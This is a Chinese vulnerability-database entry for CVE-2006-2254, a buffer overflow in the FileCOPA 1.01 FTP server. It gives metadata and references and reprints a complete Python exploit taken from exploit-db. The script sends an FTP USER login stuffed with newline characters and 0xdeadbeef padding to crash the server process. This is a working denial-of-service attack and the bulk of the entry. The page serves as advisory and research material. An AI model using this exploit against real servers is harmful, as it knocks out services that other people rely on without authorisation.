FileCOPA filecpnt.exe 缓冲区溢出

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110215 漏洞类型 缓冲区溢出
发布时间 2006-05-05 更新时间 2006-05-09
CVE编号 CVE-2006-2254 CNNVD-ID CNNVD-200605-149
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1754
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-149
|漏洞详情
FileCOPA1.01的filecpnt.exe存在缓冲区溢出。远程攻击者可以借助带有大量换行字符的文件名,引起拒绝服务(应用程序崩溃)。
|漏洞EXP
### FILECOPA DOS
### www.filecopa.com
### Found Jan 19 2006, Tested again on the new release 6 April 2006
### BY Bigeazer 
### http://blacksecurity.org

### They are selling this software for $39.95...
### oh well.. maybe they shoud fix it first?

#
# It appears that FileCopa does not handle alot of new line char
# in the USER login.  This is in the filecpnt.exe file.
# 
# This is only a DOS, that kills the ftp process


import sys,os,string
import socket
import struct
import time

print "-------------------------------"
print "- FileCopa DOS"
print "- Found by: bigeazer"
print "- Should have crashed FileCopa"
print "-------------------------------"

buffer = "\x0a" * 248 + struct.pack('<L',0xdeadbeef)  * 960 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
	conn = s.connect((sys.argv[1],21))
except:
	print "- Unable to connect. exiting."
	sys.exit(1)

d = s.recv(1024)
time.sleep(1)
s.send('USER %s\r\n' % buffer)
time.sleep(1)
sys.exit(0)

# milw0rm.com [2006-05-05]
|参考资料

来源:VUPEN
名称:ADV-2006-1679
链接:http://www.frsirt.com/english/advisories/2006/1679
来源:SECUNIA
名称:20033
链接:http://secunia.com/advisories/20033
来源:MISC
链接:http://blacksecurity.org/exploits/38/FILECOPA_V1.01_and_Below_Pre_Authentication_Remote_Overflow/111.html
来源:XF
名称:filecopa-user-dos(26300)
链接:http://xforce.iss.net/xforce/xfdb/26300
来源:BID
名称:17881
链接:http://www.securityfocus.com/bid/17881
来源:OSVDB
名称:25436
链接:http://www.osvdb.org/25436